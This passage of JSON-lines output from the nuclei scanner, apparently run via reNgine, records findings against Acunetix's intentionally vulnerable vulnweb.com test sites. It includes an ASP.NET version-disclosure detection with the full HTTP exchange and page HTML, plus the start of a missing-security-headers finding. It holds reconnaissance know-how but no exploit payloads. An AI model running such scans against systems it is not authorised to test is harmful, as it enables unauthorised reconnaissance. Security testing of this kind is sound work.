'http://testhtml5.vulnweb.com/logout'\",\"matcher-status\":true}\n{\"template\":\"http/technologies/microsoft/aspnet-version-detect.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/aspnet-version-detect\",\"template-id\":\"aspnet-version-detect\",\"template-path\":\"/home/rengine/nuclei-templates/http/technologies/microsoft/aspnet-version-detect.yaml\",\"info\":{\"name\":\"AspNet Version Disclosure - Detect\",\"author\":[\"lucky0x0d\",\"pulsesecurity.co.nz\"],\"tags\":[\"tech\",\"detect\",\"aspnet\"],\"description\":\"Detects version disclosed via 'X-AspNet-Version' header.\\n\",\"severity\":\"info\",\"metadata\":{\"shodan-query\":\"X-AspNet-Version\",\"verified\":true,\"max-request\":1},\"classification\":{\"cve-id\":null,\"cwe-id\":[\"cwe-200\"],\"cvss-metrics\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N\"}},\"type\":\"http\",\"host\":\"testaspnet.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testaspnet.vulnweb.com\",\"matched-at\":\"http://testaspnet.vulnweb.com\",\"extracted-results\":[\"2.0.50727\"],\"request\":\"GET / HTTP/1.1\\r\\nHost: testaspnet.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0.1 Safari/605.1.15\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 14069\\r\\nCache-Control: private\\r\\nContent-Type: text/html; charset=utf-8\\r\\nDate: Wed, 13 Nov 2024 02:40:45 GMT\\r\\nServer: Microsoft-IIS/8.5\\r\\nSet-Cookie: ASP.NET_SessionId=vmit32btaeasjnawkbexxh55; path=/; HttpOnly\\r\\nX-Aspnet-Version: 2.0.50727\\r\\nX-Powered-By: ASP.NET\\r\\n\\r\\n\\r\\n\\u003c!DOCTYPE HTML PUBLIC \\\"-//W3C//DTD HTML 4.0 Transitional//EN\\\" \\u003e\\r\\n\\u003cHTML\\u003e\\r\\n\\t\\u003cHEAD\\u003e\\r\\n\\t\\t\\u003ctitle\\u003eacublog news\\u003c/title\\u003e\\r\\n\\t\\t\\u003cMETA http-equiv=\\\"Content-Type\\\" content=\\\"text/html; charset=windows-1252\\\"\\u003e\\r\\n\\t\\t\\u003cmeta content=\\\"Microsoft Visual Studio .NET 7.1\\\" name=\\\"GENERATOR\\\"\\u003e\\r\\n\\t\\t\\u003cmeta content=\\\"C#\\\" name=\\\"CODE_LANGUAGE\\\"\\u003e\\r\\n\\t\\t\\u003cmeta content=\\\"JavaScript\\\" name=\\\"vs_defaultClientScript\\\"\\u003e\\r\\n\\t\\t\\u003cmeta content=\\\"http://schemas.microsoft.com/intellisense/ie5\\\" name=\\\"vs_targetSchema\\\"\\u003e\\r\\n\\t\\t\\u003cLINK href=\\\"styles.css\\\" type=\\\"text/css\\\" rel=\\\"stylesheet\\\"\\u003e\\r\\n\\t\\u003c/HEAD\\u003e\\r\\n\\t\\u003cbody\\u003e\\r\\n\\t\\t\\u003cform name=\\\"Form1\\\" method=\\\"post\\\" action=\\\"default.aspx\\\" id=\\\"Form1\\\"\\u003e\\r\\n\\u003cdiv\\u003e\\r\\n\\u003cinput type=\\\"hidden\\\" name=\\\"__EVENTTARGET\\\" id=\\\"__EVENTTARGET\\\" value=\\\"\\\" /\\u003e\\r\\n\\u003cinput type=\\\"hidden\\\" name=\\\"__EVENTARGUMENT\\\" id=\\\"__EVENTARGUMENT\\\" value=\\\"\\\" /\\u003e\\r\\n\\u003cinput type=\\\"hidden\\\" name=\\\"__VIEWSTATE\\\" id=\\\"__VIEWSTATE\\\" value=\\\"/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8/4bzlRmUHIna4LG5\\\" /\\u003e\\r\\n\\u003c/div\\u003e\\r\\n\\r\\n\\u003cscript type=\\\"text/javascript\\\"\\u003e\\r\\n//\\u003c![CDATA[\\r\\nvar theForm = document.forms['Form1'];\\r\\nif (!theForm) {\\r\\n theForm = document.Form1;\\r\\n}\\r\\nfunction __doPostBack(eventTarget, eventArgument) {\\r\\n if (!theForm.onsubmit || (theForm.onsubmit() != false)) {\\r\\n theForm.__EVENTTARGET.value = eventTarget;\\r\\n theForm.__EVENTARGUMENT.value = eventArgument;\\r\\n theForm.submit();\\r\\n }\\r\\n}\\r\\n//]]\\u003e\\r\\n\\u003c/script\\u003e\\r\\n\\r\\n\\r\\n\\u003cdiv\\u003e\\r\\n\\r\\n\\t\\u003cinput type=\\\"hidden\\\" name=\\\"__VIEWSTATEGENERATOR\\\" id=\\\"__VIEWSTATEGENERATOR\\\" value=\\\"CA0B0334\\\" /\\u003e\\r\\n\\t\\u003cinput type=\\\"hidden\\\" name=\\\"__EVENTVALIDATION\\\" id=\\\"__EVENTVALIDATION\\\" value=\\\"/wEWVwLpus/wCAKv3NmgDwKB48+iAgK20qX9DwK20qX9DwK20tmRBwK20tmRBwK20o35BQK20o35BQK20qGcDQK20qGcDQKL+bMFAov5swUCi/mn2AkCi/mn2AkCi/nb/AICi/nb/AICi/nPkwoCi/nPkwoCi/njtgMCi/njtgMCi/mXzQwCi/mXzQwCi/mL4AUCi/mL4AUCi/m/hw0Ci/m/hw0Ci/mT7AsCi/mT7AsCi/mHgwMCi/mHgwMCvJPzxAkCvJPzxAkCvJPnmwECvJPnmwECvJObvgoCvJObvgoCvJOP1QMCvJOP1QMCvJOj6AwCvJOj6AwCvJPXjAQCvJPXjAQCvJPLow0CvJPLow0CvJP/xgYCvJP/xgYCvJPTrwMCvJPTrwMCvJPHwgwCvJPHwgwCkbrR6w8CkbrR6w8CkbrFjgcCkbrFjgcCkbr5JQKRuvklApG67fgJApG67fgJApG6gZ8BApG6gZ8BApG6tbIKApG6tbIKApG6qckDApG6qckDApG63e0MApG63e0MApG6sdUJApG6sdUJApG6pegCApG6pegCAtTZ5J4HAtTZ5J4HAtTZmDUC1NmYNQLU2YzICQLU2YzICQLU2aDvAgLU2aDvAgLU2dSDCgLU2dSDCgLU2cimAwLU2cimAwLU2fz9DALU2fz9DALU2ZCQBALU2ZCQBBM7QfLxs46Xr8rthEeGdU4fr+Ig\\\" /\\u003e\\r\\n\\u003c/div\\u003e\\r\\n\\t\\t\\t\\r\\n\\u003cTABLE id=\\\"Table1\\\" cellSpacing=\\\"0\\\" cellPadding=\\\"5\\\" width=\\\"790\\\" align=\\\"center\\\" border=\\\"0\\\"\\u003e\\r\\n\\t\\u003cTR\\u003e\\r\\n\\t\\t\\u003cTD style=\\\"COLOR: #e6dccf\\\" bgColor=\\\"#806640\\\" height=\\\"75\\\"\\u003e\\u003ca href=\\\"https://www.acunetix.com/\\\"\\u003e\\u003cIMG src=\\\"images/logo_acunetix.gif\\\" align=\\\"absMiddle\\\" border=\\\"0\\\" alt=\\\"Acunetix website security\\\"\\u003e\\u003c/a\\u003e\\u003c/TD\\u003e\\r\\n\\t\\t\\u003cTD style=\\\"FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf\\\" align=\\\"right\\\" bgColor=\\\"#806640\\\"\\r\\n\\t\\t\\theight=\\\"75\\\"\\u003eTest Website for \\u003ca href=\\\"https://www.acunetix.com/vulnerability-scanner/\\\"\\u003eAcunetix Web Vulnerability Scanner\\u003c/a\\u003e\\u003c/TD\\u003e\\r\\n\\t\\u003c/TR\\u003e\\r\\n\\u003c/TABLE\\u003e\\r\\n\\u003cTABLE id=\\\"Table2\\\" cellSpacing=\\\"0\\\" cellPadding=\\\"5\\\" width=\\\"790\\\" align=\\\"center\\\" border=\\\"0\\\"\\u003e\\r\\n\\t\\u003cTR\\u003e\\r\\n\\t\\t\\u003cTD class=\\\"MenuBar\\\" style=\\\"BORDER-LEFT: #806040 1px solid\\\"\\u003e\\u003cA class=\\\"menu\\\" title=\\\"About\\\" href=\\\"about.aspx\\\"\\u003eabout\\u003c/A\\u003e\\r\\n\\t\\t\\t\\u003cA class=\\\"menu\\\" title=\\\"Latest news\\\" href=\\\"default.aspx\\\"\\u003enews\\u003c/A\\u003e \\u003ca href=\\\"login.aspx\\\" id=\\\"Mainmenu2_lnkLog\\\" class=\\\"menu\\\" name=\\\"lnkLog\\\"\\u003elogin\\u003c/a\\u003e \\u003ca href=\\\"Signup.aspx\\\" id=\\\"Mainmenu2_lnkSignup\\\" class=\\\"menu\\\" name=\\\"lnkSignup\\\"\\u003e\\r\\n\\t\\t\\t\\tsignup\\u003c/a\\u003e \\u003cA class=\\\"menu\\\" title=\\\"Network scanner\\\" href=\\\"https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/\\\"\\u003enetwork scanner\\u003c/A\\u003e\\r\\n\\t\\t\\t\\t\\u003cA class=\\\"menu\\\" title=\\\"Network vuln help\\\" href=\\\"https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/\\\"\\u003enetwork vuln help\\u003c/A\\u003e\\r\\n\\t\\t\\u003c/TD\\u003e\\r\\n\\t\\t\\u003ctd class=\\\"MenuBar\\\" align=\\\"right\\\" width=\\\"50px\\\"\\u003e\\r\\n\\t\\t\\t\\u003cA href=\\\"rssFeed.aspx\\\"\\u003e\\u003cIMG src=\\\"images/rss.gif\\\" border=\\\"0\\\"\\u003e\\u003c/A\\u003e\\r\\n\\t\\t\\u003c/td\\u003e\\r\\n\\t\\u003c/TR\\u003e\\r\\n\\u003c/TABLE\\u003e\\r\\n\\r\\n\\t\\t\\t\\u003cTABLE id=\\\"Table1\\\" cellSpacing=\\\"0\\\" cellPadding=\\\"10\\\" width=\\\"790\\\" align=\\\"center\\\" border=\\\"0\\\"\\u003e\\r\\n\\t\\t\\t\\t\\u003cTR\\u003e\\r\\n\\t\\t\\t\\t\\t\\u003cTD id=\\\"tdPageData\\\" valign=\\\"top\\\"\\u003e\\r\\n\\t\\t\\t\\t\\t\\u003cDIV class=\\\"NewsDate\\\"\\u003eposted by \\u003cstrong\\u003eadmin \\u003c/strong\\u003e on 5/16/2019 12:32:30 PM\\u0026nbsp;\\u003ca href=\\\"Comments.aspx?id=0\\\" class=\\\"NewsOperation\\\"\\u003e(37) comments\\u003c/a\\u003e\\u003c/DIV\\u003e\\u003ca href=\\\"ReadNews.aspx?id=0\\u0026NewsAd=ads/def.html\\\" class=\\\"NewsTitle\\\"\\u003eAcunetix Vulnerability Scanner Now With Network Security Scans\\u003c/a\\u003e\\u003cDIV class=\\\"NewsShort\\\"\\u003eSeamless OpenVAS integration now also available on Windows and Linux\\u003c/DIV\\u003e\\u003cDIV class=\\\"NewsDate\\\"\\u003eposted by \\u003cstrong\\u003eadmin \\u003c/strong\\u003e on 11/8/2005 11:37:35 AM\\u0026nbsp;\\u003ca href=\\\"Comments.aspx?id=3\\\" class=\\\"NewsOperation\\\"\\u003e(37) comments\\u003c/a\\u003e\\u003c/DIV\\u003e\\u003ca href=\\\"ReadNews.aspx?id=3\\u0026NewsAd=ads/def.html\\\" class=\\\"NewsTitle\\\"\\u003eAcunetix Web Vulnerability Scanner beta released!\\u003c/a\\u003e\\u003cDIV class=\\\"NewsShort\\\"\\u003e26 January 2005 - A beta version of Acunetix Web Vulnerability Scanner has been released today. The beta is available for download at http://www.acunetix.com/download/.\\u003c/DIV\\u003e\\u003cDIV class=\\\"NewsDate\\\"\\u003eposted by \\u003cstrong\\u003eadmin \\u003c/strong\\u003e on 11/8/2005 11:35:22 AM\\u0026nbsp;\\u003ca href=\\\"Comments.aspx?id=2\\\" class=\\\"NewsOperation\\\"\\u003e(41) comments\\u003c/a\\u003e\\u003c/DIV\\u003e\\u003ca href=\\\"ReadNews.aspx?id=2\\u0026NewsAd=ads/def.html\\\" class=\\\"NewsTitle\\\"\\u003eWeb attacks - can your web applications withstand the force?\\u003c/a\\u003e\\u003cDIV class=\\\"NewsShort\\\"\\u003e21 July 2005 - Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.\\u003c/DIV\\u003e\\u003c/TD\\u003e\\r\\n\\r\\n\\t\\t\\t\\t\\t\\u003cTD vAlign=\\\"top\\\" width=\\\"200\\\"\\u003e\\r\\n\\t\\t\\t\\t\\t\\t\\u003ctable id=\\\"RightPanel1_Calendar\\\" class=\\\"Calendar\\\" cellspacing=\\\"0\\\" cellpadding=\\\"1\\\" title=\\\"Calendar\\\" border=\\\"0\\\" style=\\\"background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;\\\"\\u003e\\r\\n\\t\\u003ctr\\u003e\\u003ctd colspan=\\\"7\\\" style=\\\"background-color:#E6B873;\\\"\\u003e\\u003ctable class=\\\"Calendar\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;\\\"\\u003e\\r\\n\\t\\t\\u003ctr\\u003e\\u003ctd style=\\\"width:15%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','V9040')\\\" style=\\\"color:Black\\\" title=\\\"Go to the previous month\\\"\\u003e\\u0026lt;\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:70%;\\\"\\u003eNovember 2024\\u003c/td\\u003e\\u003ctd align=\\\"right\\\" style=\\\"width:15%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','V9101')\\\" style=\\\"color:Black\\\" title=\\\"Go to the next month\\\"\\u003e\\u0026gt;\\u003c/a\\u003e\\u003c/td\\u003e\\u003c/tr\\u003e\\r\\n\\t\\u003c/table\\u003e\\u003c/td\\u003e\\u003c/tr\\u003e\\u003ctr\\u003e\\u003cth align=\\\"center\\\" abbr=\\\"Sunday\\\" scope=\\\"col\\\"\\u003eSun\\u003c/th\\u003e\\u003cth align=\\\"center\\\" abbr=\\\"Monday\\\" scope=\\\"col\\\"\\u003eMon\\u003c/th\\u003e\\u003cth align=\\\"center\\\" abbr=\\\"Tuesday\\\" scope=\\\"col\\\"\\u003eTue\\u003c/th\\u003e\\u003cth align=\\\"center\\\" abbr=\\\"Wednesday\\\" scope=\\\"col\\\"\\u003eWed\\u003c/th\\u003e\\u003cth align=\\\"center\\\" abbr=\\\"Thursday\\\" scope=\\\"col\\\"\\u003eThu\\u003c/th\\u003e\\u003cth align=\\\"center\\\" abbr=\\\"Friday\\\" scope=\\\"col\\\"\\u003eFri\\u003c/th\\u003e\\u003cth align=\\\"center\\\" abbr=\\\"Saturday\\\" scope=\\\"col\\\"\\u003eSat\\u003c/th\\u003e\\u003c/tr\\u003e\\u003ctr\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9066')\\\" style=\\\"color:Black\\\" title=\\\"October 27\\\"\\u003e27\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9067')\\\" style=\\\"color:Black\\\" title=\\\"October 28\\\"\\u003e28\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9068')\\\" style=\\\"color:Black\\\" title=\\\"October 29\\\"\\u003e29\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9069')\\\" style=\\\"color:Black\\\" title=\\\"October 30\\\"\\u003e30\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9070')\\\" style=\\\"color:Black\\\" title=\\\"October 31\\\"\\u003e31\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9071')\\\" style=\\\"color:Black\\\" title=\\\"November 01\\\"\\u003e1\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9072')\\\" style=\\\"color:Black\\\" title=\\\"November 02\\\"\\u003e2\\u003c/a\\u003e\\u003c/td\\u003e\\u003c/tr\\u003e\\u003ctr\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9073')\\\" style=\\\"color:Black\\\" title=\\\"November 03\\\"\\u003e3\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9074')\\\" style=\\\"color:Black\\\" title=\\\"November 04\\\"\\u003e4\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9075')\\\" style=\\\"color:Black\\\" title=\\\"November 05\\\"\\u003e5\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9076')\\\" style=\\\"color:Black\\\" title=\\\"November 06\\\"\\u003e6\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9077')\\\" style=\\\"color:Black\\\" title=\\\"November 07\\\"\\u003e7\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9078')\\\" style=\\\"color:Black\\\" title=\\\"November 08\\\"\\u003e8\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9079')\\\" style=\\\"color:Black\\\" title=\\\"November 09\\\"\\u003e9\\u003c/a\\u003e\\u003c/td\\u003e\\u003c/tr\\u003e\\u003ctr\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9080')\\\" style=\\\"color:Black\\\" title=\\\"November 10\\\"\\u003e10\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9081')\\\" style=\\\"color:Black\\\" title=\\\"November 11\\\"\\u003e11\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9082')\\\" style=\\\"color:Black\\\" title=\\\"November 12\\\"\\u003e12\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"border-color:#806640;width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9083')\\\" style=\\\"color:Black\\\" title=\\\"November 13\\\"\\u003e13\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9084')\\\" style=\\\"color:Black\\\" title=\\\"November 14\\\"\\u003e14\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9085')\\\" style=\\\"color:Black\\\" title=\\\"November 15\\\"\\u003e15\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9086')\\\" style=\\\"color:Black\\\" title=\\\"November 16\\\"\\u003e16\\u003c/a\\u003e\\u003c/td\\u003e\\u003c/tr\\u003e\\u003ctr\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9087')\\\" style=\\\"color:Black\\\" title=\\\"November 17\\\"\\u003e17\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9088')\\\" style=\\\"color:Black\\\" title=\\\"November 18\\\"\\u003e18\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9089')\\\" style=\\\"color:Black\\\" title=\\\"November 19\\\"\\u003e19\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9090')\\\" style=\\\"color:Black\\\" title=\\\"November 20\\\"\\u003e20\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9091')\\\" style=\\\"color:Black\\\" title=\\\"November 21\\\"\\u003e21\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9092')\\\" style=\\\"color:Black\\\" title=\\\"November 22\\\"\\u003e22\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9093')\\\" style=\\\"color:Black\\\" title=\\\"November 23\\\"\\u003e23\\u003c/a\\u003e\\u003c/td\\u003e\\u003c/tr\\u003e\\u003ctr\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9094')\\\" style=\\\"color:Black\\\" title=\\\"November 24\\\"\\u003e24\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9095')\\\" style=\\\"color:Black\\\" title=\\\"November 25\\\"\\u003e25\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9096')\\\" style=\\\"color:Black\\\" title=\\\"November 26\\\"\\u003e26\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9097')\\\" style=\\\"color:Black\\\" title=\\\"November 27\\\"\\u003e27\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9098')\\\" style=\\\"color:Black\\\" title=\\\"November 28\\\"\\u003e28\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9099')\\\" style=\\\"color:Black\\\" title=\\\"November 29\\\"\\u003e29\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9100')\\\" style=\\\"color:Black\\\" title=\\\"November 30\\\"\\u003e30\\u003c/a\\u003e\\u003c/td\\u003e\\u003c/tr\\u003e\\u003ctr\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9101')\\\" style=\\\"color:Black\\\" title=\\\"December 01\\\"\\u003e1\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9102')\\\" style=\\\"color:Black\\\" title=\\\"December 02\\\"\\u003e2\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9103')\\\" style=\\\"color:Black\\\" title=\\\"December 03\\\"\\u003e3\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9104')\\\" style=\\\"color:Black\\\" title=\\\"December 04\\\"\\u003e4\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9105')\\\" style=\\\"color:Black\\\" title=\\\"December 05\\\"\\u003e5\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9106')\\\" style=\\\"color:Black\\\" title=\\\"December 06\\\"\\u003e6\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9107')\\\" style=\\\"color:Black\\\" title=\\\"December 07\\\"\\u003e7\\u003c/a\\u003e\\u003c/td\\u003e\\u003c/tr\\u003e\\r\\n\\u003c/table\\u003e\\u003cBR\\u003e\\r\\n\\u003ca href=\\\"rssFeed.aspx\\\"\\u003eGet RSS feed\\u003c/a\\u003e\\r\\n\\u003c/TD\\u003e\\r\\n\\t\\t\\t\\t\\u003c/TR\\u003e\\r\\n\\t\\t\\t\\t\\u003cTR\\u003e\\r\\n\\t\\t\\t\\t\\t\\u003cTD colSpan=\\\"2\\\"\\u003e\\r\\n\\t\\t\\t\\t\\t\\u003c/TD\\u003e\\r\\n\\t\\t\\t\\t\\u003c/TR\\u003e\\r\\n\\t\\t\\t\\u003c/TABLE\\u003e\\r\\n\\t\\t\\u003c/form\\u003e\\r\\n\\t\\u003c/body\\u003e\\r\\n\\t\\u003cdiv style=\\\"background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px\\\"\\u003e\\r\\n\\t\\t\\u003cp style=\\\"padding-left:5%;padding-right:5%\\\"\\u003e\\u003cb\\u003eWarning\\u003c/b\\u003e: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.\\u003c/p\\u003e\\r\\n\\t\\u003c/div\\u003e\\r\\n\\u003c/HTML\\u003e\\r\\n\",\"ip\":\"44.238.29.244\",\"timestamp\":\"2024-11-13T02:41:28.857433132Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0.1 Safari/605.1.15' 'http://testaspnet.vulnweb.com'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"content-security-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/CVS/Repository\",\"path\":\"/CVS/Repository\",\"matched-at\":\"http://testphp.vulnweb.com/CVS/Repository\",\"request\":\"GET /CVS/Repository HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 